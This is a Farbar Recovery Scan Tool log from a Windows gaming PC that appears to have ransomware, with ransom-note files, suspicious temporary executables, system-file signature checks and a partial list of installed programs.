2014-10-06 19:43 - 2014-10-06 19:43 - 00008224 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:43 - 2014-10-06 19:43 - 00008224 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:43 - 2014-10-06 19:43 - 00004156 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:43 - 2014-10-06 19:43 - 00004156 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:43 - 2014-10-06 19:43 - 00000276 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL
2014-10-06 19:43 - 2014-10-06 19:43 - 00000276 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL
2014-10-06 19:42 - 2014-10-06 19:42 - 00008224 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:42 - 2014-10-06 19:42 - 00004156 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:42 - 2014-10-06 19:42 - 00000276 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-10-05 14:34 - 2014-10-22 17:12 - 00000000 ____D () C:\FRST
2014-10-05 14:33 - 2014-10-22 17:11 - 02112000 _____ (Farbar) C:\Users\RaRWolf\Downloads\FRST64.exe
2014-09-30 16:00 - 2014-10-10 22:51 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-27 14:30 - 2014-09-27 14:30 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skulltag
2014-09-27 14:30 - 2014-09-27 14:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skulltag
2014-09-24 22:41 - 2014-09-24 22:41 - 00001012 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Construct 2.lnk
2014-09-24 22:41 - 2014-09-24 22:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Construct2
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-22 17:15 - 2013-05-31 19:17 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\uTorrent
2014-10-22 17:11 - 2012-12-29 17:24 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\LogMeIn Hamachi
2014-10-22 17:08 - 2014-08-13 03:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\CrashDumps
2014-10-22 17:03 - 2012-12-26 16:37 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-22 17:00 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\sru
2014-10-22 16:59 - 2013-05-08 20:26 - 00000000 ____D () C:\Users\RaRWolf\RaR
2014-10-22 16:40 - 2012-12-26 16:30 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-22 16:33 - 2014-03-20 16:54 - 00000934 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-22 08:33 - 2014-03-20 16:54 - 00000930 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-21 18:54 - 2013-10-28 20:27 - 01132544 ___SH () C:\Users\RaRWolf\Downloads\Thumbs.db
2014-10-21 18:36 - 2012-12-26 14:37 - 00000000 ____D () C:\Users\RaRWolf
2014-10-21 18:28 - 2013-02-21 20:31 - 00000000 ____D () C:\Games
2014-10-21 08:28 - 2014-03-20 16:54 - 00003906 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-21 08:28 - 2014-03-20 16:54 - 00003670 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-20 02:01 - 2013-02-05 08:11 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Adobe
2014-10-19 21:16 - 2013-12-16 23:52 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-10-19 21:16 - 2012-07-26 03:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-19 21:14 - 2012-09-25 07:19 - 01253924 _____ () C:\Windows\WindowsUpdate.log
2014-10-19 11:53 - 2012-09-14 05:25 - 01579054 _____ () C:\Windows\DirectX.log
2014-10-19 11:37 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-18 18:58 - 2012-09-14 03:47 - 00073604 _____ () C:\Windows\PFRO.log
2014-10-18 18:31 - 2014-07-24 19:28 - 00000000 ____D () C:\Users\RaRWolf\Documents\Inform
2014-10-17 17:39 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM
2014-10-15 23:24 - 2012-12-26 14:45 - 00003594 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1557230296-4363482-4078292831-1002
2014-10-14 18:29 - 2013-12-26 14:45 - 00000000 ____D () C:\Users\RaRWolf\Documents\WB Games
2014-10-14 07:23 - 2013-05-26 21:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Pro
2014-10-14 07:23 - 2013-05-26 21:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Lite
2014-10-14 07:22 - 2014-03-24 15:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Media Player Classic
2014-10-14 06:53 - 2013-07-22 20:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\TS3Client
2014-10-14 05:42 - 2013-02-10 21:29 - 00000000 ____D () C:\Windows\Minidump
2014-10-13 18:14 - 2012-09-14 04:59 - 00000000 ____D () C:\Windows\SysWOW64\RTCOM
2014-10-13 18:14 - 2012-07-26 03:21 - 00030344 _____ () C:\Windows\setupact.log
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ___HD () C:\Program Files (x86)\Temp
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ____D () C:\Program Files (x86)\Realtek
2014-10-11 11:27 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\BBI
2014-10-11 04:18 - 2014-07-14 11:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Arma 3 Launcher
2014-10-11 03:55 - 2013-06-28 13:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Arma 3
2014-10-10 02:16 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\AUInstallAgent
2014-10-09 16:50 - 2014-06-26 14:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SkypeOld2
2014-10-08 17:56 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\Help
2014-10-07 19:44 - 2013-01-31 23:33 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-10-07 19:44 - 2013-01-31 23:32 - 00000000 ____D () C:\ProgramData\Skype
2014-10-07 19:26 - 2013-01-02 23:13 - 00000442 _____ () C:\Windows\system32\Drivers\etc\hosts.ics
2014-10-07 02:31 - 2013-01-13 21:07 - 00000000 ____D () C:\Users\RaRWolf\wurm
2014-10-06 23:01 - 2013-02-23 02:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pivot Animator
2014-10-06 22:27 - 2014-02-21 00:42 - 00000000 ____D () C:\Users\RaRWolf\Random
2014-10-06 22:17 - 2014-03-01 19:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\Space
2014-10-06 22:17 - 2013-03-22 07:10 - 00000000 ____D () C:\Users\RaRWolf\My Games
2014-10-06 22:17 - 2013-01-18 17:50 - 00000000 ____D () C:\Users\RaRWolf\Documents\Wolfire
2014-10-06 22:16 - 2014-08-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\RCT3
2014-10-06 22:16 - 2014-02-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\Rainmeter
2014-10-06 22:16 - 2013-09-14 20:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\SimCity 4
2014-10-06 22:16 - 2013-04-27 09:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\Rockstar Games
2014-10-06 22:13 - 2014-08-11 15:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\Oddworld
2014-10-06 22:13 - 2013-06-29 19:51 - 00000000 ____D () C:\Users\RaRWolf\Documents\Nexus Mod Manager
2014-10-06 22:11 - 2014-07-08 18:46 - 00000280 _____ () C:\Users\RaRWolf\Documents\New Text Document.txt
2014-10-06 22:11 - 2013-01-03 19:08 - 00000000 ____D () C:\Users\RaRWolf\Documents\My Games
2014-10-06 22:02 - 2014-04-27 20:36 - 00000000 ____D () C:\Users\RaRWolf\Documents\Klei
2014-10-06 22:02 - 2014-04-06 19:56 - 00000000 ____D () C:\Users\RaRWolf\Documents\Euro Truck Simulator 2
2014-10-06 22:02 - 2014-01-09 16:49 - 00000000 ____D () C:\Users\RaRWolf\Documents\KillHouseGames
2014-10-06 22:02 - 2013-02-17 19:12 - 00000000 ____D () C:\Users\RaRWolf\Documents\Mount&Blade With Fire and Sword
2014-10-06 22:01 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\RaRWolf\Documents\Electrontic Arts
2014-10-06 22:01 - 2013-08-18 16:37 - 00000000 ____D () C:\Users\RaRWolf\Documents\Electronic Arts
2014-10-06 21:59 - 2013-08-14 20:00 - 00000000 ____D () C:\Users\RaRWolf\Documents\EA Games
2014-10-06 21:52 - 2014-07-19 04:13 - 00000000 ____D () C:\Users\RaRWolf\Documents\Dolphin Emulator
2014-10-06 21:52 - 2014-06-18 21:51 - 00000000 ____D () C:\Users\RaRWolf\Documents\BioWare
2014-10-06 21:52 - 2013-07-06 19:20 - 00000000 ____D () C:\Users\RaRWolf\Documents\Arma 3 Alpha
2014-10-06 21:51 - 2013-06-28 13:33 - 00000000 ____D () C:\Users\RaRWolf\Documents\Arma 3
2014-10-06 21:51 - 2013-02-01 08:14 - 00000000 ____D () C:\Users\RaRWolf\Documents\ArmA 2
2014-10-06 21:48 - 2013-06-12 15:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\WorldPainter
2014-10-06 21:48 - 2013-03-20 15:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Ubisoft
2014-10-06 21:47 - 2014-02-20 15:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\steamvr
2014-10-06 21:47 - 2013-10-23 14:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SpaceEngineers
2014-10-06 21:47 - 2013-09-29 09:24 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Tropico 4
2014-10-06 21:47 - 2013-01-13 05:00 - 00726071 _____ () C:\Users\RaRWolf\AppData\Roaming\technic-launcher.jar.bak
2014-10-06 21:38 - 2013-01-31 23:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SkypeOld
2014-10-06 21:36 - 2014-08-12 13:17 - 00036632 _____ () C:\Users\RaRWolf\AppData\Roaming\RZR_0180ce6c46479a4dad8b47328d2f.db
2014-10-06 21:36 - 2014-08-01 20:16 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\RealNetworks
2014-10-06 21:36 - 2014-08-01 20:15 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Real
2014-10-06 21:36 - 2013-11-14 16:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\six-updater
2014-10-06 21:36 - 2013-04-27 09:56 - 00000000 __RHD () C:\Users\RaRWolf\AppData\Roaming\SecuROM
2014-10-06 21:35 - 2014-01-13 20:40 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Nidhogg
2014-10-06 21:35 - 2013-08-14 16:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Origin
2014-10-06 21:35 - 2013-05-12 15:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\New Technology Studio
2014-10-06 21:35 - 2013-01-05 18:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Natural Selection 2
2014-10-06 21:22 - 2013-08-08 13:36 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Mount&Blade Warband
2014-10-06 21:22 - 2013-06-22 22:57 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\MOVAVI
2014-10-06 21:22 - 2013-04-26 15:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\MinMaxGames
2014-10-06 21:22 - 2012-12-26 16:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Mozilla
2014-10-06 21:20 - 2014-04-08 22:43 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\ECSoftware
2014-10-06 21:20 - 2013-08-13 22:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DVDVideoSoft
2014-10-06 21:20 - 2013-05-09 06:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Doublefine
2014-10-06 21:20 - 2013-04-26 21:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\LOVE
2014-10-06 21:17 - 2014-08-01 19:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Corel
2014-10-06 21:17 - 2014-07-09 15:57 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DarknessII
2014-10-06 21:17 - 2014-03-27 17:32 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\CreeperWorld3
2014-10-06 21:17 - 2013-05-26 18:01 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Ultra
2014-10-06 20:58 - 2014-08-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Atari
2014-10-06 20:58 - 2012-12-26 14:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Adobe
2014-10-06 20:57 - 2013-01-13 05:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.techniclauncher
2014-10-06 20:50 - 2013-06-10 17:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.technic
2014-10-06 20:37 - 2013-08-12 15:23 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.minecraft
2014-10-06 20:34 - 2014-04-24 19:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\The Witcher
2014-10-06 20:34 - 2014-04-11 16:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\SniperV2
2014-10-06 20:34 - 2014-03-17 18:04 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Skype
2014-10-06 20:34 - 2014-03-05 22:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Uber Entertainment
2014-10-06 20:34 - 2013-06-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Skyrim
2014-10-06 20:34 - 2013-04-27 09:56 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Rockstar Games
2014-10-06 20:34 - 2013-03-05 22:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\WhatPulse
2014-10-06 20:34 - 2013-01-14 16:51 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Roblox
2014-10-06 20:32 - 2013-12-22 16:23 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Oblivion
2014-10-06 20:32 - 2013-08-22 20:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PAYDAY 2
2014-10-06 20:32 - 2013-08-14 16:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Origin
2014-10-06 20:32 - 2013-05-25 18:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Play withSIX
2014-10-06 20:32 - 2013-05-12 15:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\New Technology Studio
2014-10-06 20:32 - 2013-01-12 13:02 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PunkBuster
2014-10-06 20:14 - 2014-03-20 16:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Google
2014-10-06 20:14 - 2014-01-22 00:09 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\LucasArts
2014-10-06 20:14 - 2013-11-08 18:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Introversion
2014-10-06 20:14 - 2013-02-01 19:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\IsolatedStorage
2014-10-06 20:13 - 2014-08-27 11:08 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Electronic Arts
2014-10-06 20:13 - 2014-06-27 00:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Configuration Tool
2014-10-06 20:13 - 2014-01-29 14:03 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Blizzard
2014-10-06 20:13 - 2014-01-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Blizzard Entertainment
2014-10-06 20:13 - 2013-09-22 09:54 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\FalloutNV
2014-10-06 20:13 - 2013-09-09 18:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\CrashRpt
2014-10-06 20:13 - 2013-09-02 21:47 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\BeamNG
2014-10-06 20:13 - 2013-08-22 04:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ESN Sonar
2014-10-06 20:13 - 2013-08-19 21:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\EA Games
2014-10-06 20:13 - 2013-08-13 21:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Dxtory Software
2014-10-06 20:13 - 2013-04-21 09:29 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Fallout3
2014-10-06 19:53 - 2014-01-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Battle.net
2014-10-06 19:49 - 2013-02-21 16:22 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Apple Computer
2014-10-06 19:49 - 2013-02-01 20:09 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ArmA 2 OA
2014-10-06 19:49 - 2013-02-01 08:14 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ArmA 2
2014-10-06 19:49 - 2012-12-26 14:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\AMD
2014-10-06 19:48 - 2014-02-21 00:40 - 00000000 ____D () C:\Users\RaRWolf\Agency
2014-10-06 19:48 - 2013-02-22 22:08 - 00000000 ____D () C:\Users\RaRWolf\Adobe
2014-10-06 19:48 - 2013-02-08 12:56 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\AliensVsPredator
2014-10-06 19:43 - 2014-04-14 17:10 - 00000000 ____D () C:\Users\Public\Documents\S.T.A.L.K.E.R. - Call of Pripyat
2014-10-06 19:43 - 2013-10-12 20:13 - 00000000 ____D () C:\Users\RaRWolf\.minecraft
2014-10-06 19:42 - 2014-08-01 20:16 - 00000000 ____D () C:\ProgramData\RealNetworks
2014-10-06 19:42 - 2014-08-01 20:12 - 00000000 ____D () C:\ProgramData\Real
2014-10-06 19:42 - 2014-04-06 15:15 - 00000000 ____D () C:\ProgramData\Steam
2014-10-06 19:42 - 2013-10-28 16:47 - 00000000 ____D () C:\ProgramData\Razer
2014-10-06 19:42 - 2013-05-12 15:43 - 00000000 __SHD () C:\ProgramData\SecuROM
2014-10-06 19:39 - 2014-07-15 13:57 - 00000000 ____D () C:\ProgramData\Logishrd
2014-10-06 19:39 - 2013-10-26 22:40 - 00000000 ____D () C:\ProgramData\GFACE
2014-10-06 19:39 - 2013-08-14 16:48 - 00000000 ____D () C:\ProgramData\Origin
2014-10-06 19:38 - 2014-01-29 12:28 - 00000000 ____D () C:\ProgramData\Battle.net
2014-10-06 19:38 - 2013-08-16 11:27 - 00000000 __SHD () C:\ProgramData\DSS
2014-10-06 19:38 - 2013-06-11 20:32 - 00000000 ____D () C:\ProgramData\Desura
2014-10-06 19:38 - 2013-02-01 20:09 - 00000000 ____D () C:\ProgramData\Bohemia Interactive Studio
2014-10-03 23:44 - 2014-06-18 20:34 - 00000000 ____D () C:\Windows\C5C1C0F0D62F4DBF81D4D7EF397C228B.TMP
2014-10-03 19:22 - 2013-07-23 12:20 - 04920696 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-01 14:57 - 2013-09-02 21:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Malwarebytes
2014-10-01 14:57 - 2013-09-02 21:45 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-01 14:57 - 2013-09-02 21:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-28 16:08 - 2013-08-14 16:50 - 00000000 ____D () C:\Program Files (x86)\Origin Games
2014-09-27 14:20 - 2013-01-12 13:02 - 00348928 _____ () C:\Windows\SysWOW64\PnkBstrB.xtr
2014-09-27 14:20 - 2013-01-12 13:00 - 00348928 _____ () C:\Windows\SysWOW64\PnkBstrB.exe
2014-09-27 14:15 - 2013-01-12 13:00 - 00280904 _____ () C:\Windows\SysWOW64\PnkBstrB.ex0
2014-09-27 14:14 - 2013-08-14 16:48 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-09-27 14:11 - 2013-08-20 12:24 - 00000000 ____D () C:\Program Files (x86)\Battlelog Web Plugins
2014-09-22 02:42 - 2013-02-14 18:46 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
 
Files to move or delete:
====================
C:\Users\RaRWolf\AppData\Local\Temp\18b98\AppData\Local\Microsoft\{eaab0735-f4dd-2c20-e526-c77a5339bc54}\{eaab0735-f4dd-2c20-e526-c77a5339bc54}.exe
C:\Users\RaRWolf\DispDiag-20140430-212535-4908-1032.dat
C:\Users\RaRWolf\worldpainter_1.7.1.exe
 
 
Some content of TEMP:
====================
C:\Users\RaRWolf\AppData\Local\Temp\0005029e.exe
C:\Users\RaRWolf\AppData\Local\Temp\00140da6.exe
C:\Users\RaRWolf\AppData\Local\Temp\02642ddf.exe
C:\Users\RaRWolf\AppData\Local\Temp\03362cda.exe
C:\Users\RaRWolf\AppData\Local\Temp\036c3d01.exe
C:\Users\RaRWolf\AppData\Local\Temp\bgdfcffc.exe
C:\Users\RaRWolf\AppData\Local\Temp\obupdat.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-14 05:48
 
==================== End Of Log ============================
 
Addition:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-10-2014
Ran by RaRWolf at 2014-10-22 17:16:35
Running from C:\Users\RaRWolf\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKCU\...\uTorrent) (Version: 3.4.2.34309 - BitTorrent Inc.)
A Story About My Uncle (HKLM-x32\...\QVN0b3J5QWJvdXRNeVVuY2xl_is1) (Version: 1 - )
Ace of Spades (HKLM-x32\...\{580A2212-7116-46E6-9229-472E23F1DCC8}) (Version: 0.75.013 - Ben Aksoy)
Ace of Spades (HKLM-x32\...\Steam App 224540) (Version:  - )
Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.6.0.5970 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.6.0.5970 - Adobe Systems Incorporated) Hidden
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.5 - Adobe Systems Incorporated)
Adobe Download Assistant (x32 Version: 1.2.5 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Help Manager (x32 Version: 4.0.244 - Adobe Systems Incorporated) Hidden
Adobe Reader X (10.1.3) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.3 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
AI Suite II (HKLM-x32\...\{34D3688E-A737-44C5-9E2A-FF73618728E1}) (Version: 2.00.01 - ASUSTeK Computer Inc.)
AIMP3 (HKLM-x32\...\AIMP3) (Version: v3.55.1355, 14.07.2014 - AIMP DevTeam)
Alien Swarm (HKLM-x32\...\Steam App 630) (Version:  - Valve)
Ancient Weapon Sounds (HKLM-x32\...\{D91802D9-6A42-4563-BC37-B3E2D04DC95B}) (Version: 2.1.0 - Screaming Bee)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2F72F540-1F60-4266-9506-952B21D6640D}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version:  - Bohemia Interactive)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Assassin's Creed II (HKLM-x32\...\{8570BEE8-0CA3-4977-9AB1-80ED93F0513C}) (Version: 1.01 - Ubisoft)
Assassins Creed IV Black Flag (HKLM-x32\...\Uplay Install 273) (Version:  - Ubisoft)
Assassin's Creed Revelations (HKLM-x32\...\{33A22B2D-55BA-4508-B767-BF2E9C21A73F}) (Version: 1.00 - Ubisoft)
ASUS Ai Charger (HKLM-x32\...\{7FB64E72-9B0E-4460-A821-040C341E414A}) (Version: 1.03.00 - ASUSTeK Computer Inc.)
ASUS Easy Update (HKLM-x32\...\{E7AA854E-6756-424E-84C2-4E47D5729AFF}) (Version: 2.00.28 - ASUSTeK Computer Inc)
ASUS WebStorage Sync Agent (HKLM-x32\...\ASUS WebStorage) (Version: 1.1.3.105 - ASUS Cloud Corporation)
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4126.52 - CyberLink Corp.)
ASUSDVD (x32 Version: 10.0.4126.52 - CyberLink Corp.) Hidden
Audacity 2.0.3 (HKLM-x32\...\Audacity_is1) (Version: 2.0.3 - Audacity Team)
Auto Clicker v1.3 (HKLM-x32\...\{C0A7E4F3-82CC-416B-82C6-BA06AACFD635}_is1) (Version: 1.3 - MurGee.com)
Autodesk SketchBook Pro 6.2.4 (HKLM-x32\...\{B882B2FC-D21E-4BCA-A173-4855757DE84A}) (Version: 6.24.0000 - Autodesk)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 1942™ (HKLM-x32\...\{5BE7BD06-512B-43bf-AD78-3BD2A5F5F7B3}) (Version: 1.6.20.0 - Electronic Arts)
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Battlefront Extreme 2.2 (HKLM-x32\...\{AFD834CA-4579-49DF-9CF0-EA58822A7C2E}_is1) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.5.1 - EA Digital Illusions CE AB)
BattlEye for OA Uninstall (HKLM-x32\...\BattlEye for OA) (Version:  - )
BeamNG-Techdemo-0.3 (remove only) (HKCU\...\BeamNG-Techdemo-0.3) (Version:  - )
Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
Black Ink (HKLM-x32\...\Black Ink 0.151.1634) (Version: 0.151.1634 - Bleank)
Black Ink (x32 Version: 0.151.1634 - Bleank) Hidden
Blue Satin Skin (HKLM-x32\...\{B0C00181-ECF5-4124-A6DE-14EA663D4799}) (Version: 2.2.0 - Screaming Bee)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
Burnout Paradise: The Ultimate Box (HKLM-x32\...\Steam App 24740) (Version:  - Criterion Games)
Carmageddon EFLC 2.0.1.1 (HKLM-x32\...\Carmageddon EFLC 2.0.1.1) (Version:  - )
